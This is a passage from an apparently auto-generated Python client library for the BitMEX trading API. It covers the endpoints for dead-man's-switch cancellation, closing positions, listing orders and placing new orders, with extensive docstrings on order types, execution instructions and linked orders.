Useful as a dead-man's switch to ensure your orders are canceled in case of an outage. If called repeatedly, the existing offset will be canceled and a new one will be inserted in its place. Example usage: call this route at 15s intervals with an offset of 60000 (60s). If this route is not called within 60 seconds, all your orders will be automatically canceled. This is also available via [WebSocket](https://www.bitmex.com/app/wsAPI#Dead-Mans-Switch-Auto-Cancel). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_all_after(timeout, async=True)
>>> result = thread.get()
:param async bool
:param float timeout: Timeout in ms. Set to 0 to cancel this timer. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_cancel_all_after_with_http_info(timeout, **kwargs) # noqa: E501
else:
(data) = self.order_cancel_all_after_with_http_info(timeout, **kwargs) # noqa: E501
return data
def order_cancel_all_after_with_http_info(self, timeout, **kwargs): # noqa: E501
"""Automatically cancel all your orders after a specified timeout. # noqa: E501
Useful as a dead-man's switch to ensure your orders are canceled in case of an outage. If called repeatedly, the existing offset will be canceled and a new one will be inserted in its place. Example usage: call this route at 15s intervals with an offset of 60000 (60s). If this route is not called within 60 seconds, all your orders will be automatically canceled. This is also available via [WebSocket](https://www.bitmex.com/app/wsAPI#Dead-Mans-Switch-Auto-Cancel). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_cancel_all_after_with_http_info(timeout, async=True)
>>> result = thread.get()
:param async bool
:param float timeout: Timeout in ms. Set to 0 to cancel this timer. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['timeout'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_cancel_all_after" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'timeout' is set
if ('timeout' not in params or
params['timeout'] is None):
raise ValueError("Missing the required parameter `timeout` when calling `order_cancel_all_after`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'timeout' in params:
form_params.append(('timeout', params['timeout'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/cancelAllAfter', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
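    # Sketch of the dead-man's-switch pattern described in the docstring above
    # (assumes a configured OrderApi instance `api`; values mirror the documented
    # example: re-arm a 60s auto-cancel every 15s):
    #
    #   import time
    #   while True:
    #       api.order_cancel_all_after(timeout=60000)
    #       time.sleep(15)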
def order_close_position(self, symbol, **kwargs): # noqa: E501
"""Close a position. [Deprecated, use POST /order with execInst: 'Close'] # noqa: E501
If no `price` is specified, a market order will be submitted to close the whole of your position. This will also close all other open orders in this symbol. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_close_position(symbol, async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Symbol of position to close. (required)
:param float price: Optional limit price.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_close_position_with_http_info(symbol, **kwargs) # noqa: E501
else:
(data) = self.order_close_position_with_http_info(symbol, **kwargs) # noqa: E501
return data
def order_close_position_with_http_info(self, symbol, **kwargs): # noqa: E501
"""Close a position. [Deprecated, use POST /order with execInst: 'Close'] # noqa: E501
If no `price` is specified, a market order will be submitted to close the whole of your position. This will also close all other open orders in this symbol. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_close_position_with_http_info(symbol, async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Symbol of position to close. (required)
:param float price: Optional limit price.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['symbol', 'price'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_close_position" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'symbol' is set
if ('symbol' not in params or
params['symbol'] is None):
raise ValueError("Missing the required parameter `symbol` when calling `order_close_position`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'symbol' in params:
form_params.append(('symbol', params['symbol'])) # noqa: E501
if 'price' in params:
form_params.append(('price', params['price'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/closePosition', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_get_orders(self, **kwargs): # noqa: E501
"""Get your orders. # noqa: E501
To get open orders only, send {\"open\": true} in the filter param. See <a href=\"http://www.onixs.biz/fix-dictionary/5.0.SP2/msgType_D_68.html\">the FIX Spec</a> for explanations of these fields. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_get_orders(async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Instrument symbol. Send a bare series (e.g. XBU) to get data for the nearest expiring contract in that series. You can also send a timeframe, e.g. `XBU:monthly`. Timeframes are `daily`, `weekly`, `monthly`, `quarterly`, and `biquarterly`.
:param str filter: Generic table filter. Send JSON key/value pairs, such as `{\"key\": \"value\"}`. You can key on individual fields, and do more advanced querying on timestamps. See the [Timestamp Docs](https://www.bitmex.com/app/restAPI#Timestamp-Filters) for more details.
:param str columns: Array of column names to fetch. If omitted, will return all columns. Note that this method will always return item keys, even when not specified, so you may receive more columns than you expect.
:param float count: Number of results to fetch.
:param float start: Starting point for results.
:param bool reverse: If true, will sort results newest first.
:param datetime start_time: Starting date filter for results.
:param datetime end_time: Ending date filter for results.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_get_orders_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_get_orders_with_http_info(**kwargs) # noqa: E501
return data
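    # --- Illustrative usage sketch (editor-added commentary, not generated code) ---
    # Fetching only open orders through the generic `filter` param described in the
    # docstring above; assumes `api` is a configured, authenticated instance of this class:
    # >>> import json
    # >>> open_orders = api.order_get_orders(symbol='XBTUSD',
    # ...                                    filter=json.dumps({'open': True}),
    # ...                                    count=100, reverse=True)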
def order_get_orders_with_http_info(self, **kwargs): # noqa: E501
"""Get your orders. # noqa: E501
To get open orders only, send {\"open\": true} in the filter param. See <a href=\"http://www.onixs.biz/fix-dictionary/5.0.SP2/msgType_D_68.html\">the FIX Spec</a> for explanations of these fields. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_get_orders_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Instrument symbol. Send a bare series (e.g. XBU) to get data for the nearest expiring contract in that series. You can also send a timeframe, e.g. `XBU:monthly`. Timeframes are `daily`, `weekly`, `monthly`, `quarterly`, and `biquarterly`.
:param str filter: Generic table filter. Send JSON key/value pairs, such as `{\"key\": \"value\"}`. You can key on individual fields, and do more advanced querying on timestamps. See the [Timestamp Docs](https://www.bitmex.com/app/restAPI#Timestamp-Filters) for more details.
:param str columns: Array of column names to fetch. If omitted, will return all columns. Note that this method will always return item keys, even when not specified, so you may receive more columns than you expect.
:param float count: Number of results to fetch.
:param float start: Starting point for results.
:param bool reverse: If true, will sort results newest first.
:param datetime start_time: Starting date filter for results.
:param datetime end_time: Ending date filter for results.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['symbol', 'filter', 'columns', 'count', 'start', 'reverse', 'start_time', 'end_time'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_get_orders" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'symbol' in params:
query_params.append(('symbol', params['symbol'])) # noqa: E501
if 'filter' in params:
query_params.append(('filter', params['filter'])) # noqa: E501
if 'columns' in params:
query_params.append(('columns', params['columns'])) # noqa: E501
if 'count' in params:
query_params.append(('count', params['count'])) # noqa: E501
if 'start' in params:
query_params.append(('start', params['start'])) # noqa: E501
if 'reverse' in params:
query_params.append(('reverse', params['reverse'])) # noqa: E501
if 'start_time' in params:
query_params.append(('startTime', params['start_time'])) # noqa: E501
if 'end_time' in params:
query_params.append(('endTime', params['end_time'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_new(self, symbol, **kwargs): # noqa: E501
"""Create a new order. # noqa: E501
## Placing Orders This endpoint is used for placing orders. See individual fields below for more details on their use. #### Order Types All orders require a `symbol`. All other fields are optional except when otherwise specified. These are the valid `ordType`s: * **Limit**: The default order type. Specify an `orderQty` and `price`. * **Market**: A traditional Market order. A Market order will execute until filled or your bankruptcy price is reached, at which point it will cancel. * **MarketWithLeftOverAsLimit**: A market order that, after eating through the order book as far as permitted by available margin, will become a limit order. The difference between this type and `Market` only affects the behavior in thin books. Upon reaching the deepest possible price, if there is quantity left over, a `Market` order will cancel the remaining quantity. `MarketWithLeftOverAsLimit` will keep the remaining quantity in the books as a `Limit`. * **Stop**: A Stop Market order. Specify an `orderQty` and `stopPx`. When the `stopPx` is reached, the order will be entered into the book. * On sell orders, the order will trigger if the triggering price is lower than the `stopPx`. On buys, higher. * Note: Stop orders do not consume margin until triggered. Be sure that the required margin is available in your account so that it may trigger fully. * `Close` Stops don't require an `orderQty`. See Execution Instructions below. * **StopLimit**: Like a Stop Market, but enters a Limit order instead of a Market order. Specify an `orderQty`, `stopPx`, and `price`. * **MarketIfTouched**: Similar to a Stop, but triggers are done in the opposite direction. Useful for Take Profit orders. * **LimitIfTouched**: As above; use for Take Profit Limit orders. #### Execution Instructions The following `execInst`s are supported. If using multiple, separate with a comma (e.g. `LastPrice,Close`). * **ParticipateDoNotInitiate**: Also known as a Post-Only order. If this order would have executed on placement, it will cancel instead. * **MarkPrice, LastPrice, IndexPrice**: Used by stop and if-touched orders to determine the triggering price. Use only one. By default, `'MarkPrice'` is used. Also used for Pegged orders to define the value of `'LastPeg'`. * **ReduceOnly**: A `'ReduceOnly'` order can only reduce your position, not increase it. If you have a `'ReduceOnly'` limit order that rests in the order book while the position is reduced by other orders, then its order quantity will be amended down or canceled. If there are multiple `'ReduceOnly'` orders the least aggressive will be amended first. * **Close**: `'Close'` implies `'ReduceOnly'`. A `'Close'` order will cancel other active limit orders with the same side and symbol if the open quantity exceeds the current position. This is useful for stops: by canceling these orders, a `'Close'` Stop is ensured to have the margin required to execute, and can only execute up to the full size of your position. If `orderQty` is not specified, a `'Close'` order has an `orderQty` equal to your current position's size. * Note that a `Close` order without an `orderQty` requires a `side`, so that BitMEX knows if it should trigger above or below the `stopPx`. #### Linked Orders Linked Orders are an advanced capability. It is very powerful, but its use requires careful coding and testing. Please follow this document carefully and use the [Testnet Exchange](https://testnet.bitmex.com) while developing. BitMEX offers four advanced Linked Order types: * **OCO**: *One Cancels the Other*. 
A very flexible version of the standard Stop / Take Profit technique. Multiple orders may be linked together using a single `clOrdLinkID`. Send a `contingencyType` of `OneCancelsTheOther` on the orders. The first order that fully or partially executes (or activates for `Stop` orders) will cancel all other orders with the same `clOrdLinkID`. * **OTO**: *One Triggers the Other*. Send a `contingencyType` of `'OneTriggersTheOther'` on the primary order and then subsequent orders with the same `clOrdLinkID` will not be triggered until the primary order fully executes. * **OUOA**: *One Updates the Other Absolute*. Send a `contingencyType` of `'OneUpdatesTheOtherAbsolute'` on the orders. Then as one order has an execution, other orders with the same `clOrdLinkID` will have their order quantity amended down by the execution quantity. * **OUOP**: *One Updates the Other Proportional*. Send a `contingencyType` of `'OneUpdatesTheOtherProportional'` on the orders. Then as one order has an execution, other orders with the same `clOrdLinkID` will have their order quantity reduced proportionally by the fill percentage. #### Trailing Stops You may use `pegPriceType` of `'TrailingStopPeg'` to create Trailing Stops. The pegged `stopPx` will move as the market moves away from the peg, and freeze as the market moves toward it. To use, combine with `pegOffsetValue` to set the `stopPx` of your order. The peg is set to the triggering price specified in the `execInst` (default `'MarkPrice'`). Use a negative offset for stop-sell and buy-if-touched orders. Requires `ordType`: `'Stop', 'StopLimit', 'MarketIfTouched', 'LimitIfTouched'`. #### Simple Quantities Send a `simpleOrderQty` instead of an `orderQty` to create an order denominated in the underlying currency. This is useful for opening up a position with 1 XBT of exposure without having to calculate how many contracts it is. #### Rate Limits See the [Bulk Order Documentation](#!/Order/Order_newBulk) if you need to place multiple orders at the same time. Bulk orders require fewer risk checks in the trading engine and thus are ratelimited at **1/10** the normal rate. You can also improve your reactivity to market movements while staying under your ratelimit by using the [Amend](#!/Order/Order_amend) and [Amend Bulk](#!/Order/Order_amendBulk) endpoints. This allows you to stay in the market and avoids the cancel/replace cycle. #### Tracking Your Orders If you want to keep track of order IDs yourself, set a unique `clOrdID` per order. This `clOrdID` will come back as a property on the order and any related executions (including on the WebSocket), and can be used to get or cancel the order. Max length is 36 characters. You can also change the `clOrdID` by amending an order, supplying an `origClOrdID`, and your desired new ID as the `clOrdID` param, like so: ``` # Amends an order's leavesQty, and updates its clOrdID to \"def-456\" PUT /api/v1/order {\"origClOrdID\": \"abc-123\", \"clOrdID\": \"def-456\", \"leavesQty\": 1000} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_new(symbol, async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Instrument symbol. e.g. 'XBTUSD'. (required)
:param str side: Order side. Valid options: Buy, Sell. Defaults to 'Buy' unless `orderQty` or `simpleOrderQty` is negative.
:param float simple_order_qty: Order quantity in units of the underlying instrument (i.e. Bitcoin).
:param float order_qty: Order quantity in units of the instrument (i.e. contracts).
:param float price: Optional limit price for 'Limit', 'StopLimit', and 'LimitIfTouched' orders.
:param float display_qty: Optional quantity to display in the book. Use 0 for a fully hidden order.
:param float stop_px: Optional trigger price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders. Use a price below the current price for stop-sell orders and buy-if-touched orders. Use `execInst` of 'MarkPrice' or 'LastPrice' to define the current price used for triggering.
:param str cl_ord_id: Optional Client Order ID. This clOrdID will come back on the order and any related executions.
:param str cl_ord_link_id: Optional Client Order Link ID for contingent orders.
:param float peg_offset_value: Optional trailing offset from the current price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders; use a negative offset for stop-sell orders and buy-if-touched orders. Optional offset from the peg price for 'Pegged' orders.
:param str peg_price_type: Optional peg price type. Valid options: LastPeg, MidPricePeg, MarketPeg, PrimaryPeg, TrailingStopPeg.
:param str ord_type: Order type. Valid options: Market, Limit, Stop, StopLimit, MarketIfTouched, LimitIfTouched, MarketWithLeftOverAsLimit, Pegged. Defaults to 'Limit' when `price` is specified. Defaults to 'Stop' when `stopPx` is specified. Defaults to 'StopLimit' when `price` and `stopPx` are specified.
:param str time_in_force: Time in force. Valid options: Day, GoodTillCancel, ImmediateOrCancel, FillOrKill. Defaults to 'GoodTillCancel' for 'Limit', 'StopLimit', 'LimitIfTouched', and 'MarketWithLeftOverAsLimit' orders.
:param str exec_inst: Optional execution instructions. Valid options: ParticipateDoNotInitiate, AllOrNone, MarkPrice, IndexPrice, LastPrice, Close, ReduceOnly, Fixed. 'AllOrNone' instruction requires `displayQty` to be 0. 'MarkPrice', 'IndexPrice' or 'LastPrice' instruction valid for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders.
:param str contingency_type: Optional contingency type for use with `clOrdLinkID`. Valid options: OneCancelsTheOther, OneTriggersTheOther, OneUpdatesTheOtherAbsolute, OneUpdatesTheOtherProportional.
:param str text: Optional order annotation. e.g. 'Take profit'.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_new_with_http_info(symbol, **kwargs) # noqa: E501
else:
(data) = self.order_new_with_http_info(symbol, **kwargs) # noqa: E501
return data
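    # --- Illustrative usage sketches (editor-added commentary, not generated code) ---
    # A few of the order types described in the docstring above; assumes `api` is a
    # configured, authenticated instance of this class:
    # >>> limit = api.order_new('XBTUSD', order_qty=100, price=6400.0)   # plain limit order
    # >>> stop = api.order_new('XBTUSD', side='Sell', stop_px=6000.0,    # close-on-trigger stop
    # ...                      exec_inst='LastPrice,Close')
    # >>> trail = api.order_new('XBTUSD', side='Sell', order_qty=100,    # trailing stop, 50 USD behind
    # ...                       ord_type='Stop', peg_price_type='TrailingStopPeg',
    # ...                       peg_offset_value=-50.0)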
def order_new_with_http_info(self, symbol, **kwargs): # noqa: E501
"""Create a new order. # noqa: E501
## Placing Orders This endpoint is used for placing orders. See individual fields below for more details on their use. #### Order Types All orders require a `symbol`. All other fields are optional except when otherwise specified. These are the valid `ordType`s: * **Limit**: The default order type. Specify an `orderQty` and `price`. * **Market**: A traditional Market order. A Market order will execute until filled or your bankruptcy price is reached, at which point it will cancel. * **MarketWithLeftOverAsLimit**: A market order that, after eating through the order book as far as permitted by available margin, will become a limit order. The difference between this type and `Market` only affects the behavior in thin books. Upon reaching the deepest possible price, if there is quantity left over, a `Market` order will cancel the remaining quantity. `MarketWithLeftOverAsLimit` will keep the remaining quantity in the books as a `Limit`. * **Stop**: A Stop Market order. Specify an `orderQty` and `stopPx`. When the `stopPx` is reached, the order will be entered into the book. * On sell orders, the order will trigger if the triggering price is lower than the `stopPx`. On buys, higher. * Note: Stop orders do not consume margin until triggered. Be sure that the required margin is available in your account so that it may trigger fully. * `Close` Stops don't require an `orderQty`. See Execution Instructions below. * **StopLimit**: Like a Stop Market, but enters a Limit order instead of a Market order. Specify an `orderQty`, `stopPx`, and `price`. * **MarketIfTouched**: Similar to a Stop, but triggers are done in the opposite direction. Useful for Take Profit orders. * **LimitIfTouched**: As above; use for Take Profit Limit orders. #### Execution Instructions The following `execInst`s are supported. If using multiple, separate with a comma (e.g. `LastPrice,Close`). * **ParticipateDoNotInitiate**: Also known as a Post-Only order. If this order would have executed on placement, it will cancel instead. * **MarkPrice, LastPrice, IndexPrice**: Used by stop and if-touched orders to determine the triggering price. Use only one. By default, `'MarkPrice'` is used. Also used for Pegged orders to define the value of `'LastPeg'`. * **ReduceOnly**: A `'ReduceOnly'` order can only reduce your position, not increase it. If you have a `'ReduceOnly'` limit order that rests in the order book while the position is reduced by other orders, then its order quantity will be amended down or canceled. If there are multiple `'ReduceOnly'` orders the least aggressive will be amended first. * **Close**: `'Close'` implies `'ReduceOnly'`. A `'Close'` order will cancel other active limit orders with the same side and symbol if the open quantity exceeds the current position. This is useful for stops: by canceling these orders, a `'Close'` Stop is ensured to have the margin required to execute, and can only execute up to the full size of your position. If `orderQty` is not specified, a `'Close'` order has an `orderQty` equal to your current position's size. * Note that a `Close` order without an `orderQty` requires a `side`, so that BitMEX knows if it should trigger above or below the `stopPx`. #### Linked Orders Linked Orders are an advanced capability. It is very powerful, but its use requires careful coding and testing. Please follow this document carefully and use the [Testnet Exchange](https://testnet.bitmex.com) while developing. BitMEX offers four advanced Linked Order types: * **OCO**: *One Cancels the Other*. 
A very flexible version of the standard Stop / Take Profit technique. Multiple orders may be linked together using a single `clOrdLinkID`. Send a `contingencyType` of `OneCancelsTheOther` on the orders. The first order that fully or partially executes (or activates for `Stop` orders) will cancel all other orders with the same `clOrdLinkID`. * **OTO**: *One Triggers the Other*. Send a `contingencyType` of `'OneTriggersTheOther'` on the primary order and then subsequent orders with the same `clOrdLinkID` will not be triggered until the primary order fully executes. * **OUOA**: *One Updates the Other Absolute*. Send a `contingencyType` of `'OneUpdatesTheOtherAbsolute'` on the orders. Then as one order has an execution, other orders with the same `clOrdLinkID` will have their order quantity amended down by the execution quantity. * **OUOP**: *One Updates the Other Proportional*. Send a `contingencyType` of `'OneUpdatesTheOtherProportional'` on the orders. Then as one order has an execution, other orders with the same `clOrdLinkID` will have their order quantity reduced proportionally by the fill percentage. #### Trailing Stops You may use `pegPriceType` of `'TrailingStopPeg'` to create Trailing Stops. The pegged `stopPx` will move as the market moves away from the peg, and freeze as the market moves toward it. To use, combine with `pegOffsetValue` to set the `stopPx` of your order. The peg is set to the triggering price specified in the `execInst` (default `'MarkPrice'`). Use a negative offset for stop-sell and buy-if-touched orders. Requires `ordType`: `'Stop', 'StopLimit', 'MarketIfTouched', 'LimitIfTouched'`. #### Simple Quantities Send a `simpleOrderQty` instead of an `orderQty` to create an order denominated in the underlying currency. This is useful for opening up a position with 1 XBT of exposure without having to calculate how many contracts it is. #### Rate Limits See the [Bulk Order Documentation](#!/Order/Order_newBulk) if you need to place multiple orders at the same time. Bulk orders require fewer risk checks in the trading engine and thus are ratelimited at **1/10** the normal rate. You can also improve your reactivity to market movements while staying under your ratelimit by using the [Amend](#!/Order/Order_amend) and [Amend Bulk](#!/Order/Order_amendBulk) endpoints. This allows you to stay in the market and avoids the cancel/replace cycle. #### Tracking Your Orders If you want to keep track of order IDs yourself, set a unique `clOrdID` per order. This `clOrdID` will come back as a property on the order and any related executions (including on the WebSocket), and can be used to get or cancel the order. Max length is 36 characters. You can also change the `clOrdID` by amending an order, supplying an `origClOrdID`, and your desired new ID as the `clOrdID` param, like so: ``` # Amends an order's leavesQty, and updates its clOrdID to \"def-456\" PUT /api/v1/order {\"origClOrdID\": \"abc-123\", \"clOrdID\": \"def-456\", \"leavesQty\": 1000} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_new_with_http_info(symbol, async=True)
>>> result = thread.get()
:param async bool
:param str symbol: Instrument symbol. e.g. 'XBTUSD'. (required)
:param str side: Order side. Valid options: Buy, Sell. Defaults to 'Buy' unless `orderQty` or `simpleOrderQty` is negative.
:param float simple_order_qty: Order quantity in units of the underlying instrument (i.e. Bitcoin).
:param float order_qty: Order quantity in units of the instrument (i.e. contracts).
:param float price: Optional limit price for 'Limit', 'StopLimit', and 'LimitIfTouched' orders.
:param float display_qty: Optional quantity to display in the book. Use 0 for a fully hidden order.
:param float stop_px: Optional trigger price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders. Use a price below the current price for stop-sell orders and buy-if-touched orders. Use `execInst` of 'MarkPrice' or 'LastPrice' to define the current price used for triggering.
:param str cl_ord_id: Optional Client Order ID. This clOrdID will come back on the order and any related executions.
:param str cl_ord_link_id: Optional Client Order Link ID for contingent orders.
:param float peg_offset_value: Optional trailing offset from the current price for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders; use a negative offset for stop-sell orders and buy-if-touched orders. Optional offset from the peg price for 'Pegged' orders.
:param str peg_price_type: Optional peg price type. Valid options: LastPeg, MidPricePeg, MarketPeg, PrimaryPeg, TrailingStopPeg.
:param str ord_type: Order type. Valid options: Market, Limit, Stop, StopLimit, MarketIfTouched, LimitIfTouched, MarketWithLeftOverAsLimit, Pegged. Defaults to 'Limit' when `price` is specified. Defaults to 'Stop' when `stopPx` is specified. Defaults to 'StopLimit' when `price` and `stopPx` are specified.
:param str time_in_force: Time in force. Valid options: Day, GoodTillCancel, ImmediateOrCancel, FillOrKill. Defaults to 'GoodTillCancel' for 'Limit', 'StopLimit', 'LimitIfTouched', and 'MarketWithLeftOverAsLimit' orders.
:param str exec_inst: Optional execution instructions. Valid options: ParticipateDoNotInitiate, AllOrNone, MarkPrice, IndexPrice, LastPrice, Close, ReduceOnly, Fixed. 'AllOrNone' instruction requires `displayQty` to be 0. 'MarkPrice', 'IndexPrice' or 'LastPrice' instruction valid for 'Stop', 'StopLimit', 'MarketIfTouched', and 'LimitIfTouched' orders.
:param str contingency_type: Optional contingency type for use with `clOrdLinkID`. Valid options: OneCancelsTheOther, OneTriggersTheOther, OneUpdatesTheOtherAbsolute, OneUpdatesTheOtherProportional.
:param str text: Optional order annotation. e.g. 'Take profit'.
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['symbol', 'side', 'simple_order_qty', 'order_qty', 'price', 'display_qty', 'stop_px', 'cl_ord_id', 'cl_ord_link_id', 'peg_offset_value', 'peg_price_type', 'ord_type', 'time_in_force', 'exec_inst', 'contingency_type', 'text'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_new" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'symbol' is set
if ('symbol' not in params or
params['symbol'] is None):
raise ValueError("Missing the required parameter `symbol` when calling `order_new`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'symbol' in params:
form_params.append(('symbol', params['symbol'])) # noqa: E501
if 'side' in params:
form_params.append(('side', params['side'])) # noqa: E501
if 'simple_order_qty' in params:
form_params.append(('simpleOrderQty', params['simple_order_qty'])) # noqa: E501
if 'order_qty' in params:
form_params.append(('orderQty', params['order_qty'])) # noqa: E501
if 'price' in params:
form_params.append(('price', params['price'])) # noqa: E501
if 'display_qty' in params:
form_params.append(('displayQty', params['display_qty'])) # noqa: E501
if 'stop_px' in params:
form_params.append(('stopPx', params['stop_px'])) # noqa: E501
if 'cl_ord_id' in params:
form_params.append(('clOrdID', params['cl_ord_id'])) # noqa: E501
if 'cl_ord_link_id' in params:
form_params.append(('clOrdLinkID', params['cl_ord_link_id'])) # noqa: E501
if 'peg_offset_value' in params:
form_params.append(('pegOffsetValue', params['peg_offset_value'])) # noqa: E501
if 'peg_price_type' in params:
form_params.append(('pegPriceType', params['peg_price_type'])) # noqa: E501
if 'ord_type' in params:
form_params.append(('ordType', params['ord_type'])) # noqa: E501
if 'time_in_force' in params:
form_params.append(('timeInForce', params['time_in_force'])) # noqa: E501
if 'exec_inst' in params:
form_params.append(('execInst', params['exec_inst'])) # noqa: E501
if 'contingency_type' in params:
form_params.append(('contingencyType', params['contingency_type'])) # noqa: E501
if 'text' in params:
form_params.append(('text', params['text'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def order_new_bulk(self, **kwargs): # noqa: E501
"""Create multiple new orders for the same symbol. # noqa: E501
